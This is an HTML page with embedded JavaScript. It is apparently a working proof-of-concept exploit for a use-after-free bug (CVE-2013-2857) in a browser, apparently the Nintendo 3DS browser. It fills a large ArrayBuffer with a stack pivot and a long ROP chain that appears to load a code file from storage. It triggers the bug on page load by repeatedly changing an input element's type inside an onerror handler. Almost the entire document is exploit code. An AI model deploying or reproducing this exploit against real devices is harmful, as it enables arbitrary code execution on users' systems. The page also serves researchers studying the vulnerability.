<!--
Tested on 5.5.1
CVE-2013-2857
Use-after-free: https://bugs.chromium.org/p/chromium/issues/detail?id=240124
Result: bug is present; crash
types=["checkbox","color","date","datetime-local","email","file","hidden","image","month","number","password","radio","range","reset","search","submit","tel","text","time","url","week"]
-->
<script>
// Proof-of-concept trigger for the use-after-free named in the page header
// (CVE-2013-2857; "Tested on 5.5.1"; reported result: crash).
// NOTE(review): every numeric constant below is a fixed, target-specific value
// reproduced verbatim from the page; nothing is derived from the runtime
// environment, so the function has no portable meaning outside that build.
// @param {HTMLInputElement} a - the <input> whose `type` is reassigned in the loop.
function UaF3(a)
{
// 0x2000000 bytes (32 MiB), viewed as 32-bit words; byte offset / 4 = word index.
var bsize=0x2000000;
var p = new ArrayBuffer(bsize);
var payload = new Uint32Array(p);
// Fixed words at fixed byte offsets around 0x1ba000 (original author's comments kept).
payload[(0x1ba000+0x18)/4]=0x09300000;
payload[(0x1ba000)/4]=0x09300000;
payload[(0x1ba000+0x14c)/4]=0x00ac144c; //ldmdb r0!, {ip, sp, lr, pc} (stack pivot)
payload[(0x1ba000-0x4)/4]=0x001df60c; //POP_PC (pivot pc)
payload[(0x1ba000-0x8)/4]=0x44444444; //GARBAGE (lr)
payload[(0x1ba000-0xC)/4]=0x09310000; //ROP_ADDR (pivot sp)
// Word table copied unchanged from the page; provenance is the linked repository.
var rop=[ /* Generated from: https://github.com/yellows8/3ds_browserhax_common */
0x0027B150,0x001DF60C,0x001DF7F0,0x09320000,0x0100FFFF,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00226C10,0x0027B150,0x001DF60C,0x001DF7F0,0x00202A04,0x09320000,
0x00000004,0x00000000,0x00000000,0x00000000,0x00000000,0x00298304,0x0027B150,0x001DF60C,0x001DF7F0,0x3A45C000,0x00011000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,
0x00D1042C,0x0027B150,0x001DF60C,0x001DF7F0,0x09320000,0x636D6473,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00226C10,0x0027B150,0x001DF60C,0x001DF7F0,0x09320004,
0x0000003A,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00226C10,0x0027B150,0x001DF60C,0x001DF7F0,0x09320000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,
0x00000000,0x00318D30,0x0026276C,0x00000000,0x0027B150,0x001DF7F0,0x001DF7F0,0x09320000,0x0A000000,0x00000000,0x00800000,0x00000000,0x00000000,0x00000000,0x002634DC,0x00000001,
0x00000000,0x00000000,0x00000008,0x00000000,0x00000000,0x00000000,0x0027B150,0x001DF60C,0x001DF7F0,0x09320000,0x00000014,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,
0x00D1042C,0x0030C328,0x09320010,0x00640073,0x0063006D,0x002F003A,0x00720061,0x0031006D,0x00630031,0x0064006F,0x00000000,0x0076E6CD,0x00000000,0x00000000,0x00000000,0x0030C328,
0x0932002C,0x002E0065,0x00690062,0x0000006E,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x0076E6CD,0x00000000,0x00000000,0x00000000,0x0027B150,0x001DF60C,0x001DF7F0,
0x09320040,0x09320010,0x00000030,0x00000000,0x00000000,0x00000000,0x00000000,0x00D1044C,0x0027B150,0x001DF60C,0x001DF7F0,0x09320000,0x09320040,0x00000001,0x00000000,0x00000000,
0x00000000,0x00000000,0x003222E4,0x0026276C,0x00000000,0x0027B150,0x001DF60C,0x001DF7F0,0x09320000,0x09320020,0x3A45D000,0x00008000,0x00000000,0x00000000,0x00000000,0x0030C44C,
0x0026276C,0x00000000,0x00296E64,0x09320000,0x0027B150,0x001DF60C,0x001F7A04,0x0027B150,0x001DF60C,0x001DCDD0,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x001EC780,
0x0027B150,0x001DF60C,0x001DF7F0,0x3A45D000,0x00008000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x0029DADC,0x0030C328,0x09320010,0x00000000,0x001F1FAC,0x00000000,
0x00000000,0x00000000,0x00000000,0x001EAAFC,0x00000000,0x0076E6CD,0x00000000,0x00000000,0x00000000,0x0030C328,0x0932002C,0x002A2498,0x0029DADC,0x003222E4,0x001EC780,0x001F1FDC,
0x00000000,0x00000000,0x00000000,0x0076E6CD,0x00000000,0x00000000,0x00000000,0x0027B150,0x001DF60C,0x001DF7F0,0x3A45C000,0x09320010,0x00000030,0x00000000,0x00000000,0x00000000,
0x00000000,0x00D1044C,0x0030C328,0x09320010,0x00000000,0x0030C44C,0x00327258,0x00298304,0x00000000,0x00000000,0x00000048,0x00000000,0x0076E6CD,0x00000000,0x00000000,0x00000000,
0x0030C328,0x0932002C,0x00000000,0x00000000,0x00000000,0x003E03D0,0x00000114,0x00000000,0x00000000,0x00000000,0x0076E6CD,0x00000000,0x00000000,0x00000000,0x0027B150,0x001DF60C,
0x001DF7F0,0x3A45C030,0x09320010,0x00000030,0x00000000,0x00000000,0x00000000,0x00000000,0x00D1044C,0x0030C328,0x09320010,0x00000000,0x3A45D000,0x0063A738,0x00D11044,0x00D10BA4,
0x00D111B4,0x00D10BAC,0x00000000,0x0076E6CD,0x00000000,0x00000000,0x00000000,0x0030C328,0x0932002C,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,
0x00000000,0x0076E6CD,0x00000000,0x00000000,0x00000000,0x0027B150,0x001DF60C,0x001DF7F0,0x3A45C060,0x09320010,0x00000030,0x00000000,0x00000000,0x00000000,0x00000000,0x00D1044C,
0x0027B150,0x001DF7F0,0x001DF7F0,0x3A45D000,0x3B1336E0,0x00008000,0x00000000,0x00000000,0x00000000,0x00000000,0x002A2498,0x00000000,0x00000000,0x00000000,0x00000008,0x00000000,
0x00000000,0x00000000,0x0027B150,0x001DF60C,0x001DF7F0,0x3B9ACA00,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x002D8CD4,0x0027B150,0x001DF60C,0x001DF7F0,
0x09320000,0x01808080,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00226C10,0x0027B150,0x001DF7F0,0x001DF7F0,0x00202A04,0x09320000,0x00000004,0x00000000,0x00000000,
0x00000000,0x00000000,0x00298304,0x3A45C000,0x0FFF9000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x0027B150,0x001DF60C,0x0055B6E0,0x70707070
]
// Copy the table word-by-word, starting at byte offset 0x1ba000+0x10000.
for(var i=0; i < rop.length; i++) payload[(0x1ba000+0x10000+(i*4))/4]=rop[i];
// 1000 iterations: allocate a 0x18-byte buffer, fill its six words with the
// constants below, then reassign the element's type to "hidden".
for(var i=0;i<1000;i++){
var buf = new ArrayBuffer(0x18);
var bufView = new Uint32Array(buf);
bufView[0]=0x11131100;
bufView[1]=0x09300000; //r5
bufView[2]=0x39010018; //r6
bufView[3]=0x44161400;
bufView[4]=0xffffffff;
bufView[5]=0x66181600;
a.type="hidden";
}
}
</script>
<input type="image" onerror="UaF3(this);" src=""/>